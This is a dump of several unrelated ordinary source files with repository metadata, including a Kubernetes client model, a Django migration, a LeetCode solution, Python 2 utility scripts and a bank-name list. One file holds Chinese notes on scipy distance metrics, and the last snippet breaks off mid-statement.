| 2020-07-25T17:48:53
| 2020-07-25T17:48:52
| null |
UTF-8
|
Python
| false
| false
| 1,117
|
py
|
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for billing commands."""
from googlecloudsdk.core import resources
PROJECTS_COLLECTION = 'cloudbilling.projects'
ACCOUNTS_COLLECTION = 'cloudbilling.billingAccounts'
def GetRegistry():
registry = resources.REGISTRY.Clone()
registry.RegisterApiByName('cloudbilling', 'v1')
return registry
def ParseProject(project_id):
return GetRegistry().Parse(project_id, collection=PROJECTS_COLLECTION)
def ParseAccount(account_id):
return GetRegistry().Parse(account_id, collection=ACCOUNTS_COLLECTION)
|
[
"vinvivo@users.noreply.github.com"
] |
vinvivo@users.noreply.github.com
|
83e04af598a29f1f5bb89e074965a329449c3d81
|
bc1928bb2742ad96bceb725e4bca65abd9bdbcaf
|
/NinjaGold/venv/bin/pip2
|
c23e2d6f7d0480927da64b475980713b2e1817b2
|
[] |
no_license
|
waterFlowin/Python-Projects
|
767ad675be902739cea0119e554ed3501eeba793
|
1503bc0c236295c53c38f8fbc5189f4a9b7ba1f1
|
refs/heads/master
| 2021-01-20T00:21:08.155024
| 2017-04-23T03:48:20
| 2017-04-23T03:48:20
| 89,115,581
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 262
|
#!/Users/waterFlow/Documents/PythonAssignments/NinjaGold/venv/bin/python2.7
# -*- coding: utf-8 -*-
import re
import sys
from pip import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"johndoe@example.com"
] |
johndoe@example.com
|
|
5c9c45a5bbfac836a6957791a648c100d07822db
|
dfaf6f7ac83185c361c81e2e1efc09081bd9c891
|
/k8sdeployment/k8sstat/python/kubernetes/client/models/v1beta1_local_subject_access_review.py
|
0010ecb23188972522b0f3c64241b7f6a494e26f
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
JeffYFHuang/gpuaccounting
|
d754efac2dffe108b591ea8722c831d979b68cda
|
2c63a63c571240561725847daf1a7f23f67e2088
|
refs/heads/master
| 2022-08-09T03:10:28.185083
| 2022-07-20T00:50:06
| 2022-07-20T00:50:06
| 245,053,008
| 0
| 0
|
MIT
| 2021-03-25T23:44:50
| 2020-03-05T02:44:15
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 7,366
|
py
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
OpenAPI spec version: v1.15.6
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class V1beta1LocalSubjectAccessReview(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'api_version': 'str',
'kind': 'str',
'metadata': 'V1ObjectMeta',
'spec': 'V1beta1SubjectAccessReviewSpec',
'status': 'V1beta1SubjectAccessReviewStatus'
}
attribute_map = {
'api_version': 'apiVersion',
'kind': 'kind',
'metadata': 'metadata',
'spec': 'spec',
'status': 'status'
}
def __init__(self, api_version=None, kind=None, metadata=None, spec=None, status=None): # noqa: E501
"""V1beta1LocalSubjectAccessReview - a model defined in OpenAPI""" # noqa: E501
self._api_version = None
self._kind = None
self._metadata = None
self._spec = None
self._status = None
self.discriminator = None
if api_version is not None:
self.api_version = api_version
if kind is not None:
self.kind = kind
if metadata is not None:
self.metadata = metadata
self.spec = spec
if status is not None:
self.status = status
@property
def api_version(self):
"""Gets the api_version of this V1beta1LocalSubjectAccessReview. # noqa: E501
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources # noqa: E501
:return: The api_version of this V1beta1LocalSubjectAccessReview. # noqa: E501
:rtype: str
"""
return self._api_version
@api_version.setter
def api_version(self, api_version):
"""Sets the api_version of this V1beta1LocalSubjectAccessReview.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources # noqa: E501
:param api_version: The api_version of this V1beta1LocalSubjectAccessReview. # noqa: E501
:type: str
"""
self._api_version = api_version
@property
def kind(self):
"""Gets the kind of this V1beta1LocalSubjectAccessReview. # noqa: E501
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds # noqa: E501
:return: The kind of this V1beta1LocalSubjectAccessReview. # noqa: E501
:rtype: str
"""
return self._kind
@kind.setter
def kind(self, kind):
"""Sets the kind of this V1beta1LocalSubjectAccessReview.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds # noqa: E501
:param kind: The kind of this V1beta1LocalSubjectAccessReview. # noqa: E501
:type: str
"""
self._kind = kind
@property
def metadata(self):
"""Gets the metadata of this V1beta1LocalSubjectAccessReview. # noqa: E501
:return: The metadata of this V1beta1LocalSubjectAccessReview. # noqa: E501
:rtype: V1ObjectMeta
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""Sets the metadata of this V1beta1LocalSubjectAccessReview.
:param metadata: The metadata of this V1beta1LocalSubjectAccessReview. # noqa: E501
:type: V1ObjectMeta
"""
self._metadata = metadata
@property
def spec(self):
"""Gets the spec of this V1beta1LocalSubjectAccessReview. # noqa: E501
:return: The spec of this V1beta1LocalSubjectAccessReview. # noqa: E501
:rtype: V1beta1SubjectAccessReviewSpec
"""
return self._spec
@spec.setter
def spec(self, spec):
"""Sets the spec of this V1beta1LocalSubjectAccessReview.
:param spec: The spec of this V1beta1LocalSubjectAccessReview. # noqa: E501
:type: V1beta1SubjectAccessReviewSpec
"""
if spec is None:
raise ValueError("Invalid value for `spec`, must not be `None`") # noqa: E501
self._spec = spec
@property
def status(self):
"""Gets the status of this V1beta1LocalSubjectAccessReview. # noqa: E501
:return: The status of this V1beta1LocalSubjectAccessReview. # noqa: E501
:rtype: V1beta1SubjectAccessReviewStatus
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this V1beta1LocalSubjectAccessReview.
:param status: The status of this V1beta1LocalSubjectAccessReview. # noqa: E501
:type: V1beta1SubjectAccessReviewStatus
"""
self._status = status
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1beta1LocalSubjectAccessReview):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"JeffYFHuang@github.com"
] |
JeffYFHuang@github.com
|
40e963c4b3b5b9e68d8105b83d2b6b6c606d607d
|
04cfd073ca0ce0e55a437ea6c1fd6536873d7553
|
/ex45.py
|
37c91b8eb307fd86a3ac004192e82bea6f32e679
|
[] |
no_license
|
randy-wittorp/ex
|
5a682be54cf72404349fe397e4c7b3357d2b32d8
|
f8c22f0507609e69dadaf8a847dd7d8c4aad304f
|
refs/heads/master
| 2016-09-05T09:57:14.924825
| 2015-05-11T02:37:28
| 2015-05-11T02:37:28
| 35,258,942
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,960
|
py
|
from sys import argv
script, filename = argv
print "=" * 40, '\n\n'
print "Let's make up a bunch of different types of rooms for a game."
print "At anytime, enter [Q] to quit.\n\n"
target = open(filename, 'w')
game_rooms = []
while True:
room = {}
# get the name of a room
print "First, what type of room is it? Let's give it a name."
room['name'] = raw_input("> ").lower().capitalize()
if room['name'].lower() == 'q':
break
print "Great! %s is a great room type.\n" % room['name']
# get the description of a room
print "Write a short description of a %s" % room['name']
room['description'] = raw_input("> ")
if room['description'].lower() == 'q':
break
print "\nWe're making great progress! So far we have this:"
print "%s:" % room['name'], room['description']
# get the greeting for the player as he enters
print "\nWhat would you like the player to read as he enters the %s?" % room['name']
room['greeting'] = raw_input("> ")
if room['greeting'].lower() == 'q':
break
# add it to the list!!!!
game_rooms.append(room)
print "\n\n", "That room's done! Let's do another! \n", "=" * 40
print "Remember, [Q]uit will get you out of here.\n\n"
# print game_rooms
for room in game_rooms:
print """class %s(Room):
\"\"\"%s\"\"\"
def __init__(self)
self.greeting = \"%s\"
""" % (room['name'], room['description'], room['greeting'])
#need to write a Dungeon/Room class that has coord mgmt system
#Dungeon.__init__ should take two integers for a width and height. Rooms could be created at random, and the Room class could determine available directions to move
#Each Specific type of room should have a short puzzle to overcome, then give the available paths (N, S, E, W)
#Dungeon will store a two dimensional list of rooms
#will need to import random to generate random rooms
|
[
"="
] |
=
|
789a17b497fcabc2aa2f1afd85c5bd55ffaf58a1
|
6af81c1e3853255f064ce58e848b34211decdd23
|
/test/top/api/rest/DeliveryTemplateDeleteRequest.py
|
ed625006af2c7cf18003711289ed9a7a170cdc58
|
[] |
no_license
|
dacy413/TBAutoTool
|
d472445f54f0841f2cd461d48ec6181ae2182d92
|
ca7da4638d38dd58e38c680ee03aaccf575bce7b
|
refs/heads/master
| 2016-09-06T16:13:01.633177
| 2015-02-01T00:04:50
| 2015-02-01T00:04:50
| 29,625,228
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 328
|
py
|
'''
Created by auto_sdk on 2015-01-20 12:36:26
'''
from top.api.base import RestApi
class DeliveryTemplateDeleteRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
self.template_id = None
def getapiname(self):
return 'taobao.delivery.template.delete'
|
[
"1656505353@qq.com"
] |
1656505353@qq.com
|
fa3a4ad9a1fb7ac12f9eeee873960f975fe4b561
|
083b3f5b0d23c269c6a9ff1ea413e70fb799a497
|
/Leetcode Challenge/09_September_2020/Python/Week 1/4_Partition Labels.py
|
d7760779eeaf21e4b1358e275335701835e975b5
|
[] |
no_license
|
HectorIGH/Competitive-Programming
|
b2e02dff140d9ebb06c646f7be0b53ea0afe90c9
|
467058c63e8a7e76805feebe3020bac4d20516a6
|
refs/heads/master
| 2022-12-31T18:32:46.824626
| 2020-10-16T20:38:33
| 2020-10-16T20:38:33
| 279,733,136
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,275
|
py
|
#A string S of lowercase English letters is given. We want to partition this string into as many parts as possible so that each letter appears in at most one part, and return a list of integers representing the size of these parts.
#
#
#
#Example 1:
#
#Input: S = "ababcbacadefegdehijhklij"
#Output: [9,7,8]
#Explanation:
#The partition is "ababcbaca", "defegde", "hijhklij".
#This is a partition so that each letter appears in at most one part.
#A partition like "ababcbacadefegde", "hijhklij" is incorrect, because it splits S into less parts.
#
#
#Note:
#
#S will have length in range [1, 500].
#S will consist of lowercase English letters ('a' to 'z') only.
#
#
# Hide Hint #1
#Try to greedily choose the smallest partition that includes the first letter. If you have something like "abaccbdeffed", then you might need to add b. You can use an map like "last['b'] = 5" to help you expand the width of your partition.
class Solution:
    def partitionLabels(self, S: str) -> 'List[int]':
        """Split *S* into the maximum number of parts such that each letter
        occurs in at most one part; return the sizes of the parts.

        Greedy single pass: a part can only close at index ``i`` once every
        letter seen since the part began has its last occurrence at or
        before ``i``.

        Note: the annotation is quoted because ``List`` is never imported
        in this file; an unquoted ``List[int]`` would raise ``NameError``
        at definition time outside the LeetCode harness.
        """
        # Last index at which each character occurs in S.
        last = {c: i for i, c in enumerate(S)}
        j = 0       # furthest last-occurrence among letters in the current part
        anchor = 0  # start index of the current part
        ans = []
        for i, c in enumerate(S):
            j = max(j, last[c])
            if i == j:  # no letter of this part appears later -> close it
                ans.append(i - anchor + 1)
                anchor = i + 1
        return ans
|
[
"HectorIGH@users.noreply.github.com"
] |
HectorIGH@users.noreply.github.com
|
bd38508a4ddf2cb90bdd31c649292c99a7e7cbf3
|
b343b5101e453fff9d59a1644ba54f77ead0bad2
|
/face_test/metric-distance.py
|
a951870b8795d33ac57810c90c148f74b0b74e86
|
[] |
no_license
|
BarshaGuha/face-detect-recognize
|
cb0643f9297d803d3b05ae1f7036757c8ba43d0b
|
d193669c3a68b645d9cce30378c20d225d0fef7f
|
refs/heads/master
| 2020-04-10T16:04:12.846940
| 2018-10-31T07:21:22
| 2018-10-31T07:21:22
| 161,132,045
| 1
| 1
| null | 2018-12-10T07:05:46
| 2018-12-10T07:05:46
| null |
UTF-8
|
Python
| false
| false
| 2,869
|
py
|
#python
#similarity distance
今天一个偶然的机会体会到了python数据运算的强大。求一个数组各样本之间的距离仅简单的几句代码就行。看来真的技术改变世界啊。废话不多说,记下来怕以后忘记。
[python] view plain copy
from scipy.spatial.distance import pdist, squareform
下面结合API文档标注一下具体用法:
[python] view plain copy
1.X = pdist(X, 'euclidean')
计算数组X样本之间的欧式距离 返回值为 Y 为压缩距离元组或矩阵(以下等同)
[python] view plain copy
2. X = pdist(X, 'minkowski', p)
计算数组样本之间的明氏距离
[python] view plain copy
3. Y = pdist(X, 'cityblock')
计算数组样本之间的曼哈顿距离
[python] view plain copy
4. X = pdist(X, 'seuclidean', V=None)
计算数组样本之间的标准化欧式距离 ,v是方差向量,表示 v[i]表示第i个分量的方差,如果缺失。默认自动计算。
[python] view plain copy
5. X = pdist(X, 'sqeuclidean')
计算数组样本之间欧式距离的平方
[python] view plain copy
6. X = pdist(X, 'cosine')
计算数组样本之间余弦距离 公式为:
[python] view plain copy
7. X = pdist(X, 'correlation')
计算数组样本之间的相关距离。
[python] view plain copy
8.X = pdist(X, 'hamming')
计算数据样本之间的汉明距离
[python] view plain copy
9. X = pdist(X, 'jaccard')
计算数据样本之间的杰卡德距离
[python] view plain copy
10. X = pdist(X, 'chebyshev')
计算数组样本之间的切比雪夫距离
[python] view plain copy
11. X = pdist(X, 'canberra')
[python] view plain copy
计算数组样本之间的堪培拉距离
[python] view plain copy
12. X = pdist(X, 'mahalanobis', VI=None)
[python] view plain copy
计算数据样本之间的马氏距离
还有好多不常用的距离就不一一写出了,如果想查阅可以点 点我,点我
[python] view plain copy
除了对指定的距离计算该函数还可以穿lmbda表达式进行计算,如下
[python] view plain copy
dm = pdist(X, lambda u, v: np.sqrt(((u-v)**2).sum()))
二、得到压缩矩阵后还需下一步即:
[python] view plain copy
Y=scipy.spatial.distance.squareform(X, force='no', checks=True)
[python] view plain copy
其中,X就是上文提到的压缩矩阵Y,force 如同MATLAB一样,如果force等于‘tovector’ or ‘tomatrix’,输入就会被当做距离矩阵或距离向量。
[python] view plain copy
checks参数:当X-X.T比较小或diag(X)接近于零时,有必要设成True。返回值Y为一个距离矩阵,Y[i,j]表示样本i与样本j的距离。
|
[
"lixiaoyu283284@163.com"
] |
lixiaoyu283284@163.com
|
39569cf295296908556488db4b1939a139e7dd20
|
037a97b5de833dfdd6b9489e776cf6be651c2703
|
/fpraktikum/migrations/0013_auto_20170913_1402.py
|
d86db83742caf7dadcea2f1acefe1883b435a415
|
[
"MIT"
] |
permissive
|
PhysikOnline/fpraktikum_backend
|
6fc6ec521749f92387e7b99873b27a73b255d46a
|
b040aef86dba6137f1c5d0fd936143a48b4f9c13
|
refs/heads/master
| 2021-04-18T19:46:24.019906
| 2020-03-15T15:43:16
| 2020-03-15T15:43:16
| 126,201,619
| 2
| 1
|
MIT
| 2020-06-05T17:37:58
| 2018-03-21T15:38:11
|
Python
|
UTF-8
|
Python
| false
| false
| 2,404
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-09-13 14:02
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated schema migration (Django 1.11, 2017-09-13).

    Renames ``user_snumber`` to ``user_login`` on the waitlist, adds
    ``user_matrikel`` (and name fields on the waitlist) across the fp*
    models, and rebuilds the unique-together constraints to include
    the new columns.
    """
    dependencies = [
        ('fpraktikum', '0012_auto_20170912_1105'),
    ]
    operations = [
        migrations.AlterModelOptions(
            name='fpwaitlist',
            options={'verbose_name': 'Waitlist', 'verbose_name_plural': 'Waitlists'},
        ),
        migrations.RenameField(
            model_name='fpwaitlist',
            old_name='user_snumber',
            new_name='user_login',
        ),
        # Matriculation number added to all three user-like models.
        migrations.AddField(
            model_name='fpuserpartner',
            name='user_matrikel',
            field=models.CharField(blank=True, max_length=100, null=True, verbose_name='Matrikelnumber'),
        ),
        migrations.AddField(
            model_name='fpuserregistrant',
            name='user_matrikel',
            field=models.CharField(blank=True, max_length=100, null=True, verbose_name='Matrikelnumber'),
        ),
        # Waitlist switches from a single name field to first/last name.
        migrations.AddField(
            model_name='fpwaitlist',
            name='user_firstname',
            field=models.CharField(max_length=100, null=True, verbose_name='user firstname'),
        ),
        migrations.AddField(
            model_name='fpwaitlist',
            name='user_lastname',
            field=models.CharField(max_length=100, null=True, verbose_name='user lastname'),
        ),
        migrations.AddField(
            model_name='fpwaitlist',
            name='user_matrikel',
            field=models.CharField(blank=True, max_length=100, null=True, verbose_name='Matrikelnummer'),
        ),
        migrations.AlterUniqueTogether(
            name='fpuserpartner',
            unique_together=set([('user_firstname', 'user_lastname', 'user_email', 'user_login', 'user_matrikel')]),
        ),
        migrations.AlterUniqueTogether(
            name='fpuserregistrant',
            unique_together=set([('user_firstname', 'user_lastname', 'user_email', 'user_login', 'user_matrikel')]),
        ),
        migrations.RemoveField(
            model_name='fpwaitlist',
            name='user_name',
        ),
        migrations.AlterUniqueTogether(
            name='fpwaitlist',
            unique_together=set([('user_firstname', 'user_lastname', 'user_email', 'user_login', 'user_matrikel')]),
        ),
    ]
|
[
"chgad.games@gmail.com"
] |
chgad.games@gmail.com
|
d421307da7fd37864161ea2092ae764586add0c4
|
c1a0c19b236a7291d1ab510611206ff8946b8655
|
/run.py
|
d5a367baaa99410b1277617e4727f2711ff0be6c
|
[] |
no_license
|
LeeHuangChen/2018_03_22_MosaicFinderResultAnalysis
|
5e211e5d3a931ae8030ac0a8b907f99863262f98
|
dcf0de140a3385ac2f5b4f3efc08fa84c890af26
|
refs/heads/master
| 2021-04-15T13:06:05.928299
| 2018-03-22T22:53:13
| 2018-03-22T22:53:13
| 126,397,794
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,783
|
py
|
import Configurations as conf
import os
from cPickle import load
from src import util
def readResultFile(folder, filename):
    """Parse one tab-separated MosaicFinder result file.

    Returns a pair ``(fusedDict, familyDict)``:

    * ``fusedDict`` maps a fused-protein id -> ``[fusion_event, f1, f2]``
      where f1/f2 are the two family numbers parsed from the id
      (or -1/-1 when the id has too few ``_``-separated fields).
    * ``familyDict`` maps a fusion event -> {0..3: [family numbers]},
      keyed by the family number MosaicFinder assigned (column 3).

    The first line of the file is a header and is skipped.  Ids starting
    with 'f' are family proteins; everything else is treated as a fused
    protein.
    """
    fusedDict = {}
    familyDict = {}
    with open(os.path.join(folder, filename)) as f:
        for i, line in enumerate(f):
            if i > 0:
                # reference:
                #   0        1             2              3                4
                #   gene_id  fusion_event  family_number  start_med_align1 end_med_align1
                #   5                6               7
                #   start_med_align2 end_med_align2  break_point
                arr = line.split("\t")
                # family proteins only have 3 values
                pid = arr[0]
                fEvent = arr[1]
                familyNumMF = arr[2]
                if pid[0] == 'f':
                    # Family protein: id like "f<N>_...".
                    splitInfo = pid.split("_")
                    if len(splitInfo) > 3:
                        familyNumber = -2  # unexpected id shape -> sentinel
                    else:
                        familyNumber = int(splitInfo[0][1:])
                    if fEvent in familyDict.keys():
                        subDict = familyDict[fEvent]
                        # Defensive reset; NOTE(review): sub-dict values are
                        # always initialised as lists below, so this branch
                        # looks unreachable -- confirm before relying on it.
                        if type(subDict[1]) != list:
                            subDict[1] = []
                            subDict[2] = []
                            subDict[3] = []
                        subDict[int(familyNumMF)].append(familyNumber)
                    else:
                        familyDict[fEvent] = {0: [], 1: [], 2: [], 3: []}
                        familyDict[fEvent][int(familyNumMF)].append(familyNumber)
                else:
                    # Fused protein: family numbers live at fields 3 and 5.
                    splitInfo = pid.split("_")
                    if len(splitInfo) <= 2:
                        f1 = -1
                        f2 = -1
                    else:
                        # id = splitInfo[1]
                        f1 = int(splitInfo[3])
                        f2 = int(splitInfo[5])
                        # g = int(splitInfo[7])
                        # split = int(splitInfo[9])
                    fusedDict[pid] = [fEvent, f1, f2]
    return fusedDict, familyDict
def main():
    """Aggregate MosaicFinder results into Results.txt.

    For every result file in ``conf.inputFolder``, parse the simulation
    parameters out of the filename, score how well the family assignments
    match the families encoded in the fused-protein ids, and write one
    summary row (TEvo, NFam, NFusions, avgConf, numProt) per file.

    NOTE: this is Python 2 code (statement-form ``print``, bare
    ``reduce``); it will not run under Python 3 as-is.
    """
    filenames = os.listdir(conf.inputFolder)
    util.generateDirectories(conf.resultFolder)
    with open(os.path.join(conf.resultFolder, "Results.txt"), "w") as wf:
        wf.write("TEvo\tNFam\tNFusions\tavgConf\tnumProt\n")
        for filename in filenames:
            # reference:
            # 0 1    2    3    4    5 6        7 8    9   10   11 12
            # M_mjtt_SeqL_1000_NFam_2_NFusions_2_TEvo_1.5_NGen_5_ BorderInformation
            parsed = filename.split("_")
            # model = parsed[1]
            # seqLen = parsed[3]
            NFam = parsed[5]
            NFusions = parsed[7]
            TEvo = parsed[9]
            # NGen = parsed[11]
            fusedDict, familyDict = readResultFile(conf.inputFolder, filename)
            confidenceArr = []
            for pid in fusedDict.keys():
                fEvent, f1, f2 = fusedDict[pid]
                mf1s = familyDict[fEvent][1]
                mf2s = familyDict[fEvent][2]
                # NOTE(review): ``success`` is initialised but never
                # incremented, yet printed below -- looks like dead or
                # unfinished code; confirm intent.
                success = 0
                totalAssigns = len(mf1s) + len(mf2s)
                print pid
                print mf1s
                print mf2s
                #print familyDict[fEvent][3]
                # First pass decides which MF group corresponds to f1.
                # NOTE(review): both pre-swap loops compare against f1, and
                # the counters are re-incremented (not reset) after the
                # swap -- the scoring below only tests >0, so this may be
                # tolerated, but verify.
                success1 = 0
                success2 = 0
                for f in mf1s:
                    if f == f1:
                        success1 += 1
                for f in mf2s:
                    if f == f1:
                        success2 += 1
                if success1 > success2:
                    mf1 = mf1s
                    mf2 = mf2s
                else:
                    mf1 = mf2s
                    mf2 = mf1s
                for f in mf1:
                    if f == f1:
                        success1 += 1
                for f in mf2:
                    if f == f2:
                        success2 += 1
                # if totalAssigns == 0:
                #     confi = 0
                # else:
                #     confi = float(success)/totalAssigns
                # Confidence: 1 if both families matched, 0 if neither,
                # 0.5 if exactly one did.
                if success1 > 0 and success2 > 0:
                    confi = 1
                elif success1 == 0 and success2 == 0:
                    confi = 0
                else:
                    confi = .5
                confidenceArr.append(confi)
                print confi, success, totalAssigns
            # Mean confidence over all fused proteins in this file
            # (raises ZeroDivisionError if the file had none).
            avgConf = reduce(lambda x, y: x + y, confidenceArr)/float(len(confidenceArr))
            wf.write(str(TEvo) + "\t" + str(NFam) + "\t" + str(NFusions) + "\t")
            wf.write(str(avgConf) + "\t" + str(len(fusedDict.keys())) + "\n")

if __name__ == '__main__':
    main()
|
[
"lhc1@rice.edu"
] |
lhc1@rice.edu
|
ba073293648a25847d17dc772cd96e10004f5085
|
2c1e06ff5fc659188735bba84707d07ab1578f58
|
/backend/deposits/helpers/banks.py
|
9cd234c213c944457aa8ac2d9acf51c35b5db110
|
[] |
no_license
|
aviaryan/deposits-app
|
b15db26d4fe79d5934b36167d2edfa70c1f009f2
|
dc6e4e93749aa2001feba35b461b4c1168a893a1
|
refs/heads/master
| 2021-03-30T21:26:24.923656
| 2018-05-11T09:06:40
| 2018-05-11T09:06:40
| 124,782,433
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,013
|
py
|
# bank = https://tin.tin.nsdl.com/tan/Bank.html
# Names of supported Indian banks, one per line; converted to a list below.
BANKS = """
Allahabad Bank
Andhra Bank
Axis Bank
Bank of Bahrain and Kuwait
Bank of Baroda - Corporate Banking
Bank of Baroda - Retail Banking
Bank of India
Bank of Maharashtra
Canara Bank
Central Bank of India
City Union Bank
Corporation Bank
Deutsche Bank
Development Credit Bank
Dhanlaxmi Bank
Federal Bank
ICICI Bank
IDBI Bank
Indian Bank
Indian Overseas Bank
IndusInd Bank
ING Vysya Bank
Jammu and Kashmir Bank
Karnataka Bank Ltd
Karur Vysya Bank
Kotak Bank
Laxmi Vilas Bank
Oriental Bank of Commerce
Punjab National Bank - Corporate Banking
Punjab National Bank - Retail Banking
Punjab & Sind Bank
Shamrao Vitthal Co-operative Bank
South Indian Bank
State Bank of Bikaner & Jaipur
State Bank of Hyderabad
State Bank of India
State Bank of Mysore
State Bank of Patiala
State Bank of Travancore
Syndicate Bank
Tamilnad Mercantile Bank Ltd.
UCO Bank
Union Bank of India
United Bank of India
Vijaya Bank
Yes Bank Ltd
"""
# str.split() already returns a list, so the former list() wrapper was redundant.
BANKS = BANKS.strip().split('\n')
|
[
"avi.aryan123@gmail.com"
] |
avi.aryan123@gmail.com
|
2e37aa5d9e2825c50325ba060540a1765c2d14f7
|
0475a5b592a4f9d9bff229dc4308ab6a5e6f1ba9
|
/pyalysis/_compat.py
|
c839af6cebaec9d4342a3128f85843d17b9f8a3a
|
[
"BSD-3-Clause"
] |
permissive
|
DasIch/pyalysis
|
5f7cf7ff188739e117136315a79e1cb8a6aa9734
|
314fd86c268b9b0fd61bf4ab2dbf10810e77a8bf
|
refs/heads/master
| 2016-09-06T05:51:00.478360
| 2014-02-26T02:54:49
| 2014-02-26T02:54:49
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,772
|
py
|
# coding: utf-8
"""
pyalysis._compat
~~~~~~~~~~~~~~~~
:copyright: 2014 by Daniel Neuhäuser and Contributors
"""
import sys
import codecs
# Detect PyPy by probing for its marker module.
try:
    import __pypy__
    del __pypy__
    PYPY = True
except ImportError:
    PYPY = False

PY2 = sys.version_info[0] == 2

if PY2:
    # On Python 2, unicode is the text type, iterators use .next(),
    # and stdout/stderr need explicit encoding wrappers.
    text_type = unicode
    def implements_iterator(cls):
        # Map Python-3-style __next__ onto Python 2's next().
        cls.next = cls.__next__
        del cls.__next__
        return cls
    stdout = codecs.lookup(
        sys.stdout.encoding or 'utf-8'
    ).streamwriter(sys.stdout)
    stderr = codecs.lookup(
        sys.stderr.encoding or 'utf-8'
    ).streamwriter(sys.stderr)
else:
    # On Python 3 the native objects already do the right thing.
    text_type = str
    def implements_iterator(cls):
        return cls
    stdout = sys.stdout
    stderr = sys.stderr
# copied from Flask: flask/_compat.py
# copyright 2014 by Armin Ronacher
# licensed under BSD
#
def with_metaclass(meta, *bases):
    """Create a base class that applies *meta* to subclasses under both
    Python 2 and Python 3, without leaving a dummy class in the MRO.

    Usage: ``class C(with_metaclass(Meta, Base)): ...``
    """
    # This requires a bit of explanation: the basic idea is to make a
    # dummy metaclass for one level of class instantiation that replaces
    # itself with the actual metaclass.  Because of internal type checks
    # we also need to make sure that we downgrade the custom metaclass
    # for one level to something closer to type (that's why __call__ and
    # __init__ comes back from type etc.).
    #
    # This has the advantage over six.with_metaclass in that it does not
    # introduce dummy classes into the final MRO.
    class metaclass(meta):
        __call__ = type.__call__
        __init__ = type.__init__
        def __new__(cls, name, this_bases, d):
            # this_bases is None only for the temporary class below;
            # real subclasses get constructed with the actual metaclass.
            if this_bases is None:
                return type.__new__(cls, name, (), d)
            return meta(name, bases, d)
    return metaclass('temporary_class', None, {})
|
[
"dasdasich@gmail.com"
] |
dasdasich@gmail.com
|
14935b76244e1588351e41945ab39bd8eda80882
|
18a79067223932c2f7aa6ff6b81d0b3f36169db2
|
/atcoder/abc198/A.py
|
3a9ccde63436d9b2a4c9eedca30aad16300ec6a6
|
[] |
no_license
|
aadiupadhyay/CodeForces
|
894b0e5faef73bfd55a28c2058fb0ca6f43c69f9
|
76dac4aa29a2ea50a89b3492387febf6515cf43e
|
refs/heads/master
| 2023-04-12T17:58:52.733861
| 2021-05-07T20:08:00
| 2021-05-11T20:07:11
| 330,149,645
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 591
|
py
|
# aadiupadhyay
import os.path
from math import gcd, floor, ceil, factorial
from collections import *
import sys
mod = 1000000007
INF = float('inf')
# Competitive-programming fast-I/O helpers over sys.stdin/sys.stdout.
def st(): return list(sys.stdin.readline().strip())            # line -> list of chars
def li(): return list(map(int, sys.stdin.readline().split()))  # line -> list of ints
def mp(): return map(int, sys.stdin.readline().split())        # line -> int iterator
def inp(): return int(sys.stdin.readline())                    # line -> single int
def pr(n): return sys.stdout.write(str(n)+"\n")                # write value + newline
def prl(n): return sys.stdout.write(str(n)+" ")                # write value + space
# Local testing: redirect stdio to files when input.txt is present.
if os.path.exists('input.txt'):
